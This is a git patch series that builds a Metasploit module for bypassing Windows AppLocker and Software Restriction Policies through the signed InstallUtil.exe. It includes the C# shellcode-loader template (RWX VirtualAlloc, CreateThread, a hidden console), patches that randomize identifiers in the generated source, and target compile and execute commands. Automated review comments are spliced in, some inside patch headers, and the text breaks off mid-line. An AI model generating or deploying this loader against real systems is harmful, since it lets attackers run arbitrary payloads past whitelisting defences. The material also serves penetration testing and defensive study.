From 487714b98e3ec8c08c57a86caa446ec3984dc6fd Mon Sep 17 00:00:00 2001
From: Mike Menasi
Date: Mon, 29 Apr 2019 21:34:56 +0100
Subject: [PATCH 01/18] add new evasion module applocker_evasion_install_util
---
 .../windows/applocker_evasion_install_util.md | 9 ++
 .../windows/applocker_evasion_install_util.rb | 112 ++++++++++++++++++
 2 files changed, 121 insertions(+)
 create mode 100644 documentation/modules/evasion/windows/applocker_evasion_install_util.md
 create mode 100644 modules/evasion/windows/applocker_evasion_install_util.rb
diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md
new file mode 100644
index 000000000000..44591a0bb3ec
--- /dev/null
+++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md
@@ -0,0 +1,9 @@
+## Intro
+
+This module is designed to evade solutions such as software restriction policies and Applocker.
+The main vector for this bypass is to use the trusted binary Install_Util.exe in executing user supplied code.
+
+## Vulnerable Application
+
+This evasion will work on all versions of Windows that include .net versions 3.5 or greater (note: ensure the selected payload matches the target os architecture).
+
diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb
new file mode 100644
index 000000000000..32c959084d62
--- /dev/null
+++ b/modules/evasion/windows/applocker_evasion_install_util.rb
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Evasion
+
+ def initialize(info={})
+ super(merge_info(info,
+ 'Name' => 'applocker_evasion_install_util',
+ 'Description' => %q{
+ This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies.
+ This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code.
+ },
+ 'Author' =>
+ [
+ 'Nick Tyrer <@NickTyrer>', # For Module
+ 'Casey Smith', # install_util bypass research
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'win',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'Targets' => [ ['Microsoft Windows', {}] ]
+ ))
+
+ register_options([
+ OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])
+ ])
+ end
+
+
+ def build_payload
+ esc = Rex::Text.encode_base64(payload.encoded)
+ end
+
+
+ def instructions
+ <<~HEREDOC
+ ___________________________________________________________________________________________________________________________________________
+ | |
+ | Instructions |
+ |___________________________________________________________________________________________________________________________________________|
+ | |
+ | 1.Copy the entire contents of #{datastore['FILENAME']} to the target and execute: |
+ | 2.x86{ |
+ | Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} |
+ | Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe |
+ | } |
+ | x64{ |
+ | Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} |
+ | Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U 
installutil.exe |
+ | } |
+ |___________________________________________________________________________________________________________________________________________|
+ HEREDOC
+ end
+
+
+ def install_util
+ esc = build_payload
+ test = Rex::Text.rand_text_alphanumeric (8)
+ <<~HEREDOC
+ /*
+ #{instructions}
+ */
+ using System;
+ namespace #{Rex::Text.rand_text_alpha 8}
+ {
+ public class #{Rex::Text.rand_text_alphanumeric 8} { public static void Main() { } }
+ [System.ComponentModel.RunInstaller(true)]
+ public class #{Rex::Text.rand_text_alphanumeric 8} : System.Configuration.Install.Installer
+ {
+ private static Int32 MEM_COMMIT=0x1000;
+ private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
+ private static UInt32 INFINITE = 0xFFFFFFFF;
+ [System.Runtime.InteropServices.DllImport("kernel32")]
+ private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
+ [System.Runtime.InteropServices.DllImport("kernel32")]
+ private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
+ [System.Runtime.InteropServices.DllImport("kernel32")]
+ private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
+ [System.Runtime.InteropServices.DllImport("user32.dll")]
+ static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
+ [System.Runtime.InteropServices.DllImport("Kernel32")]
+ private static extern IntPtr GetConsoleWindow();
+ const int SW_HIDE = 0;
+ const int SW_SHOW = 5;
+ public override void Uninstall(System.Collections.IDictionary s)
+ {
+ IntPtr hwnd;
+ hwnd = GetConsoleWindow();
+ ShowWindow(hwnd, SW_HIDE);
+ string #{test} = "#{esc}";
+ byte[] newBytes = Convert.FromBase64String(#{test});
+ byte[] sc = newBytes;
+ IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
+ IntPtr id = IntPtr.Zero;
+ WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), 
INFINITE); + } + } + } + HEREDOC + end + + + def run + file_create(install_util) + print_status("#{instructions}") + end + +end + From ee7ef7ad4e9033db3f2c555499f239b1452d9ee4 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 29 Apr 2019 22:23:49 +0100 Subject: [PATCH 02/18] fix typo --- .../modules/evasion/windows/applocker_evasion_install_util.md | 2 +- modules/evasion/windows/applocker_evasion_install_util.rb | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index 44591a0bb3ec..81e96b0eba1a 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -1,7 +1,7 @@ ## Intro This module is designed to evade solutions such as software restriction policies and Applocker. -The main vector for this bypass is to use the trusted binary Install_Util.exe in executing user supplied code. +The main vector for this bypass is to use the trusted binary InstallUtil.exe in executing user supplied code. ## Vulnerable Application diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 32c959084d62..07f99dd381d6 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -36,6 +36,7 @@ def build_payload def instructions <<~HEREDOC + ___________________________________________________________________________________________________________________________________________ | | | Instructions | From 38256a18bd6bbe027e95614196586e8cb04c210c Mon Sep 17 00:00:00 2001 
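Review bot: `build_payload` assigns `esc = Rex::Text.encode_base64(payload.encoded)` and never reads the local, so the method returns the value only because the assignment happens to be its last expression; `Rex::Text.encode_base64(payload.encoded)` on its own says the same thing without the dead variable. In `install_util`, `Rex::Text.rand_text_alphanumeric (8)` puts a space before the parenthesised argument, which Ruby treats as a grouped expression and warns about under `-w`; write `Rex::Text.rand_text_alphanumeric(8)`. `run` wraps the heredoc in `print_status("#{instructions}")` although `instructions` already returns a String, so `print_status(instructions)` is enough. None of the four methods carries a comment; a one-liner above each, such as `# Renders the C# source that file_create writes to FILENAME.` above `install_util`, would let a reader skip the heredoc. The `FILENAME` option description repeats the default (`default: install_util.txt`) that `OptString` already displays alongside the option.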
From: NickTyrer Date: Wed, 1 May 2019 17:05:40 +0100 Subject: [PATCH 03/18] added further obfuscation to module --- .../windows/applocker_evasion_install_util.rb | 41 +++++++++++-------- 1 file changed, 23 insertions(+), 18 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 07f99dd381d6..87b20d9fefe5 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -14,7 +14,7 @@ def initialize(info={}) }, 'Author' => [ - 'Nick Tyrer <@NickTyrer>', # For Module + 'Nick Tyrer <@NickTyrer>', # for module development 'Casey Smith', # install_util bypass research ], 'License' => MSF_LICENSE, @@ -58,17 +58,23 @@ def instructions def install_util esc = build_payload - test = Rex::Text.rand_text_alphanumeric (8) + moda = Rex::Text.rand_text_alpha (3) + modb = Rex::Text.rand_text_alpha (3) + modc = Rex::Text.rand_text_alpha (3) + modd = Rex::Text.rand_text_alpha (3) + mode = Rex::Text.rand_text_alpha (3) + modf = Rex::Text.rand_text_alpha (3) + modg = Rex::Text.rand_text_alpha (3) <<~HEREDOC /* #{instructions} */ using System; - namespace #{Rex::Text.rand_text_alpha 8} + namespace #{Rex::Text.rand_text_alpha 3} { - public class #{Rex::Text.rand_text_alphanumeric 8} { public static void Main() { } } + public class #{Rex::Text.rand_text_alphanumeric 3} { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] - public class #{Rex::Text.rand_text_alphanumeric 8} : System.Configuration.Install.Installer + public class #{Rex::Text.rand_text_alphanumeric 3} : System.Configuration.Install.Installer { private static Int32 MEM_COMMIT=0x1000; private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; 
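Review bot: The seven `modX = Rex::Text.rand_text_alpha (3)` lines added to `install_util` are one statement repeated, and the `@@ -65,6 +65,9 @@` hunk of PATCH 04 extends the run to ten; a single destructuring assignment, `moda, modb, modc, modd, mode, modf, modg = Array.new(7) { Rex::Text.rand_text_alpha(3) }`, states the intent once and also removes the space before the parenthesised argument that Ruby warns about under `-w`. The namespace and class identifiers inside the heredoc are still produced inline with `rand_text_alpha 3` / `rand_text_alphanumeric 3` rather than through the same variables, so two naming mechanisms sit side by side in one method. A short comment above the assignments saying that these locals are the identifiers substituted into the generated source would help the next maintainer; the letter suffixes alone do not convey which name stands for what. `install_util` and its heredoc continue past the end of the hunk.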
@@ -80,23 +86,22 @@ def install_util [System.Runtime.InteropServices.DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); [System.Runtime.InteropServices.DllImport("user32.dll")] - static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); + static extern bool ShowWindow(IntPtr #{modg}, int nCmdShow); [System.Runtime.InteropServices.DllImport("Kernel32")] private static extern IntPtr GetConsoleWindow(); - const int SW_HIDE = 0; - const int SW_SHOW = 5; + const int #{modf} = 0; public override void Uninstall(System.Collections.IDictionary s) { - IntPtr hwnd; - hwnd = GetConsoleWindow(); - ShowWindow(hwnd, SW_HIDE); - string #{test} = "#{esc}"; - byte[] newBytes = Convert.FromBase64String(#{test}); - byte[] sc = newBytes; - IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); - IntPtr id = IntPtr.Zero; - WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); + IntPtr #{modg}; + #{modg} = GetConsoleWindow(); + ShowWindow(#{modg}, #{modf}); + string #{moda} = "#{esc}"; + byte[] #{modb} = Convert.FromBase64String(#{moda}); + byte[] #{modc} = #{modb}; + IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length); + IntPtr #{mode} = IntPtr.Zero; + WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), INFINITE); } } } From f023fb95253655a2665aa8e715e1518663a9f0d9 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Thu, 2 May 2019 08:39:35 +0100 Subject: [PATCH 04/18] add further obfuscation --- .../windows/applocker_evasion_install_util.rb | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) 
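Review bot: `modg` is used for two unrelated things in this hunk: the `IntPtr` parameter name in the `ShowWindow` extern declaration and, a few lines later, the local handle introduced by `IntPtr #{modg};` in `Uninstall`. The parameter name on a `DllImport` declaration is never referenced by callers, so renaming only it while `nCmdShow` keeps its original name yields an inconsistent declaration for no effect; restoring `static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);` keeps the declaration and the local apart. Dropping the unused `SW_SHOW` constant is fine, but after the rename `const int #{modf} = 0;` no longer says what it is, so a Ruby-side comment above that heredoc line noting that `modf` stands in for `SW_HIDE` would keep the mapping readable. `install_util` begins before the start of the hunk.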
diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 87b20d9fefe5..dfb1bc2fa876 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -65,6 +65,9 @@ def install_util mode = Rex::Text.rand_text_alpha (3) modf = Rex::Text.rand_text_alpha (3) modg = Rex::Text.rand_text_alpha (3) + modh = Rex::Text.rand_text_alpha (3) + modi = Rex::Text.rand_text_alpha (3) + modj = Rex::Text.rand_text_alpha (3) <<~HEREDOC /* #{instructions} @@ -72,13 +75,13 @@ def install_util using System; namespace #{Rex::Text.rand_text_alpha 3} { - public class #{Rex::Text.rand_text_alphanumeric 3} { public static void Main() { } } + public class #{Rex::Text.rand_text_alpha 3} { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] - public class #{Rex::Text.rand_text_alphanumeric 3} : System.Configuration.Install.Installer + public class #{Rex::Text.rand_text_alpha 3} : System.Configuration.Install.Installer { - private static Int32 MEM_COMMIT=0x1000; - private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; - private static UInt32 INFINITE = 0xFFFFFFFF; + private static Int32 #{modh}=0x1000; + private static IntPtr #{modi}=(IntPtr)0x40; + private static UInt32 #{modj} = 0xFFFFFFFF; [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); [System.Runtime.InteropServices.DllImport("kernel32")] 
@@ -98,10 +101,10 @@ def install_util string #{moda} = "#{esc}"; byte[] #{modb} = Convert.FromBase64String(#{moda}); byte[] #{modc} = #{modb}; - IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, #{modh}, #{modi}); System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length); IntPtr #{mode} = IntPtr.Zero; - WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), INFINITE); + WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), #{modj}); } } } From 9a6d56a8dee1d8315c621f1a8ad0f3fb623e5d32 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Thu, 23 May 2019 20:29:11 +0100 Subject: [PATCH 05/18] fix typo --- modules/evasion/windows/applocker_evasion_install_util.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index dfb1bc2fa876..e3ce23604332 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -15,7 +15,7 @@ def initialize(info={}) 'Author' => [ 'Nick Tyrer <@NickTyrer>', # for module development - 'Casey Smith', # install_util bypass research + 'Casey Smith', # for install_util bypass research ], 'License' => MSF_LICENSE, 'Platform' => 'win', 
@@ -42,7 +42,7 @@ def instructions | Instructions | |___________________________________________________________________________________________________________________________________________| | | - | 1.Copy the entire contents of #{datastore['FILENAME']} to the target and execute: | + | 1.Copy #{datastore['FILENAME']} to the target and execute: | | 2.x86{ | | Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | | Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | From f6eeb7b4b1b767ab00dc901a57e037f48b9246f4 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Thu, 23 May 2019 20:35:29 +0100 Subject: [PATCH 06/18] fix typo --- modules/evasion/windows/applocker_evasion_install_util.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index e3ce23604332..d9e9275fb4e9 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -14,8 +14,8 @@ def initialize(info={}) }, 'Author' => [ - 'Nick Tyrer <@NickTyrer>', # for module development - 'Casey Smith', # for install_util bypass research + 'Nick Tyrer <@NickTyrer>', # module development + 'Casey Smith', # install_util bypass research ], 'License' => MSF_LICENSE, 'Platform' => 'win', From b7221a65a11d0b2f7382722b135ced0197a13d1b Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Sun, 26 May 2019 22:18:43 +0100 Subject: [PATCH 07/18] addressed issues raised by @cbrnrd --- .../windows/applocker_evasion_install_util.rb | 50 +++++++------------ 1 file changed, 17 insertions(+), 33 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index d9e9275fb4e9..ce1a7be2049f 100644 
--- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -7,7 +7,7 @@ class MetasploitModule < Msf::Evasion def initialize(info={}) super(merge_info(info, - 'Name' => 'applocker_evasion_install_util', + 'Name' => 'Applocker Evasion .NET Framework Installation Utility', 'Description' => %q{ This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code. @@ -20,7 +20,8 @@ def initialize(info={}) 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'Targets' => [ ['Microsoft Windows', {}] ] + 'Targets' => [ ['Microsoft Windows', {}] ], + 'References' => [ ['URL', 'https://attack.mitre.org/techniques/T1118/'] ] )) register_options([ 
@@ -35,43 +36,26 @@ def build_payload def instructions - <<~HEREDOC + if payload.arch.first == ARCH_X86 + print_status "Copy #{datastore['FILENAME']} to the target" + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + else + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + end + end - ___________________________________________________________________________________________________________________________________________ - | | - | Instructions | - |___________________________________________________________________________________________________________________________________________| - | | - | 1.Copy #{datastore['FILENAME']} to the target and execute: | - | 2.x86{ | - | Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | - | Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | - | } | - | x64{ | - | Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | - | Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | - | } | - |___________________________________________________________________________________________________________________________________________| - HEREDOC + + def mod(var) + var = Rex::Text.rand_text_alpha (3) end def install_util esc = build_payload - moda = 
Rex::Text.rand_text_alpha (3) - modb = Rex::Text.rand_text_alpha (3) - modc = Rex::Text.rand_text_alpha (3) - modd = Rex::Text.rand_text_alpha (3) - mode = Rex::Text.rand_text_alpha (3) - modf = Rex::Text.rand_text_alpha (3) - modg = Rex::Text.rand_text_alpha (3) - modh = Rex::Text.rand_text_alpha (3) - modi = Rex::Text.rand_text_alpha (3) - modj = Rex::Text.rand_text_alpha (3) + moda, modb, modc, modd, mode, modf, modg, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) <<~HEREDOC - /* - #{instructions} - */ using System; namespace #{Rex::Text.rand_text_alpha 3} { @@ -114,7 +98,7 @@ def install_util def run file_create(install_util) - print_status("#{instructions}") + instructions end end From ab20c24340280b44b6fe56e35567a3e4e0498fbd Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 16:34:53 +0100 Subject: [PATCH 08/18] fix setting mod variables --- modules/evasion/windows/applocker_evasion_install_util.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index ce1a7be2049f..2d876273e199 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -7,7 +7,7 @@ class MetasploitModule < Msf::Evasion def initialize(info={}) super(merge_info(info, - 'Name' => 'Applocker Evasion .NET Framework Installation Utility', + 'Name' => 'Applocker Evasion - .NET Framework Installation Utility', 'Description' => %q{ This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code. 
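Review bot: The multiple assignment in `install_util` lists thirteen targets (`mode`, `modf` and `modg` each appear twice) against ten values, so `modh`, `modi` and `modj` are left `nil` and the heredoc lines that interpolate them (see the `@@ -72,13 +75,13 @@` hunk of PATCH 04) render with an empty identifier. `mod(var)` also accepts an argument it immediately overwrites, and `mod(moda)` only parses because Ruby declares the left-hand locals before evaluating the right-hand side. A parameterless helper plus one generated list removes both oddities: `def mod; Rex::Text.rand_text_alpha(3); end` and `moda, modb, modc, modd, mode, modf, modg, modh, modi, modj = Array.new(10) { mod }`. In the new `instructions`, the `Copy #{datastore['FILENAME']} to the target` line is printed only in the `ARCH_X86` branch, so x64 users never see it; it belongs before the `if`. `install_util` and its heredoc continue past the end of the hunk.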
@@ -54,7 +54,7 @@ def mod(var) def install_util esc = build_payload - moda, modb, modc, modd, mode, modf, modg, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) + moda, modb, modc, modd, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) <<~HEREDOC using System; namespace #{Rex::Text.rand_text_alpha 3} @@ -102,4 +102,3 @@ def run end end - From 894d817fd16167305827fe008204527d3ae3e5d0 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 16:58:16 +0100 Subject: [PATCH 09/18] updated instructions function --- modules/evasion/windows/applocker_evasion_install_util.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 2d876273e199..31d52e06ead4 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -36,8 +36,8 @@ def build_payload def instructions + print_status "Copy #{datastore['FILENAME']} to the target" if payload.arch.first == ARCH_X86 - print_status "Copy #{datastore['FILENAME']} to the target" print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" else From 73f234a48a5565a11e61d8cbff8d81e0fdf69fe9 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 17:55:58 +0100 Subject: [PATCH 10/18] address documentation issues raised by @cbrnrd --- .../windows/applocker_evasion_install_util.md | 27 ++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) 
diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index 81e96b0eba1a..a6515f9e06c9 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md 
@@ -1,9 +1,30 @@ ## Intro -This module is designed to evade solutions such as software restriction policies and Applocker. -The main vector for this bypass is to use the trusted binary InstallUtil.exe in executing user supplied code. +This module is designed to evade solutions such as software restriction policies and Applocker. +Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories. +It enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" +The main vector for this bypass is to use the trusted binary InstallUtil.exe which is located within the trusted Windows directory and also has the ability to execute user supplied code. ## Vulnerable Application -This evasion will work on all versions of Windows that include .net versions 3.5 or greater (note: ensure the selected payload matches the target os architecture). +This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active. +## Options + +- **FILENAME** - Filename for the evasive file (default: install_util.txt). + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use evasion/windows/applocker_evasion_install_util` + 3. Do: `set PAYLOAD ` + 4. Do: `run` + 5. The module will now display instructions of how to proceed: + `[+] install_util.txt stored at /root/.msf4/local/install_util.txt` + `[*] Copy install_util.txt to the target` + `[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). 
+ `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + +## References + +https://attack.mitre.org/techniques/T1118/ From 4487ae7ad3ef0b94239efefaa56641a839ab9332 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 18:01:40 +0100 Subject: [PATCH 11/18] fix formatting --- .../evasion/windows/applocker_evasion_install_util.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index a6515f9e06c9..bea67a7a3541 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md 
@@ -20,10 +20,10 @@ This evasion will work on all versions of Windows that include .NET versions 3.5 3. Do: `set PAYLOAD ` 4. Do: `run` 5. The module will now display instructions of how to proceed: - `[+] install_util.txt stored at /root/.msf4/local/install_util.txt` - `[*] Copy install_util.txt to the target` - `[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). - `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + -`[+] install_util.txt stored at /root/.msf4/local/install_util.txt` + -`[*] Copy install_util.txt to the target` + -`[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + -`[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). ## References From a3b22cbec42e2f7fa7783255ca29ae7e3bba7341 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 18:04:24 +0100 Subject: [PATCH 12/18] fix formatting --- .../evasion/windows/applocker_evasion_install_util.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index bea67a7a3541..9c922f9808ae 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md 
+++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -19,11 +19,11 @@ This evasion will work on all versions of Windows that include .NET versions 3.5 2. Do: `use evasion/windows/applocker_evasion_install_util` 3. Do: `set PAYLOAD ` 4. Do: `run` - 5. The module will now display instructions of how to proceed: - -`[+] install_util.txt stored at /root/.msf4/local/install_util.txt` - -`[*] Copy install_util.txt to the target` - -`[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). - -`[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + 5. The module will now display instructions of how to proceed + 6. `[+] install_util.txt stored at /root/.msf4/local/install_util.txt` + 7. `[*] Copy install_util.txt to the target` + 8. `[*] Compile using: 